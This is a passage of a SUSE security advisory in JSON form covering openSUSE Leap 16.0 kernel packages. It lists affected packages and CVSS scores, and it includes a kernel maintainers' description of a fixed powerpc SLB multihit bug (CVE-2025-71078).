"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
